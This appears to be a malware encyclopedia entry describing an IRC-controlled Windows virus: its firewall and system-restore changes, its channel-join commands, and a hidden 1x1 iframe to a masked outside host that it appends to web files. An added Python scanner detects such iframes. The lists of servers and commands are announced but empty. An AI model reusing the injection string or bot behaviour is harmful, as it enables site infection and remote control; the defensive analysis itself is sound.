The virus adds the executable file of the host process to the Windows firewall list of trusted applications.
Then it disables the “Restore system files” function.
The virus attempts to contact the following IRC servers:
If a connection is established, the virus sends the following commands to the server:
NICK dewxxpyi
USER b
JOIN #.<rnd1>
where rnd1 is a random number.
Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.
The virus is capable of executing the following commands:
The virus also scans the victim computer’s hard drive for files with the following extensions:
HTM PHP ASP
If found, it adds the following string into them:
<iframe src="http://****.pl/rc/" width=1 height=1
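To check a web root for this kind of modification, the following added example (not part of the original description) walks a directory tree, opens files with the three extensions listed above, and reports any iframe whose width and height are both 0 or 1. The function names, the 0/1 threshold and the `example.invalid` sample strings are assumptions made for the illustration.

```python
import os
import re
import sys

EXTENSIONS = (".htm", ".php", ".asp")   # file types named in the description
TINY = {"0", "1"}                        # assumption: 0/1-pixel frames count as hidden

# Opening iframe tag; '>' is optional because an appended tag may be truncated.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)", re.IGNORECASE)
# name=value pairs with double-quoted, single-quoted or bare values.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

# Constructed sample inputs (not taken from a real infection).
SAMPLE_INFECTED = ('<html><body>ok</body></html>'
                   '<iframe src="http://example.invalid/rc/" width=1 height=1')
SAMPLE_CLEAN = '<iframe src="/video" width="640" height="360"></iframe>'

def parse_attrs(tag_body):
    """Return the attributes of one tag as a lower-cased dict."""
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(tag_body):
        attrs[name.lower()] = dq or sq or bare
    return attrs

def find_hidden_iframes(html):
    """Return the src of every iframe whose width and height are both 0 or 1."""
    hits = []
    for match in IFRAME_RE.finditer(html):
        attrs = parse_attrs(match.group(1))
        if attrs.get("width") in TINY and attrs.get("height") in TINY:
            hits.append(attrs.get("src", ""))
    return hits

def scan_tree(root):
    """Map each matching file under root to the hidden iframe sources found in it."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                findings[path] = hits
    return findings

if __name__ == "__main__":
    for path, sources in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, sources)
```

A hit is a lead for review rather than proof of infection, since some legitimate pages also embed 1x1 frames.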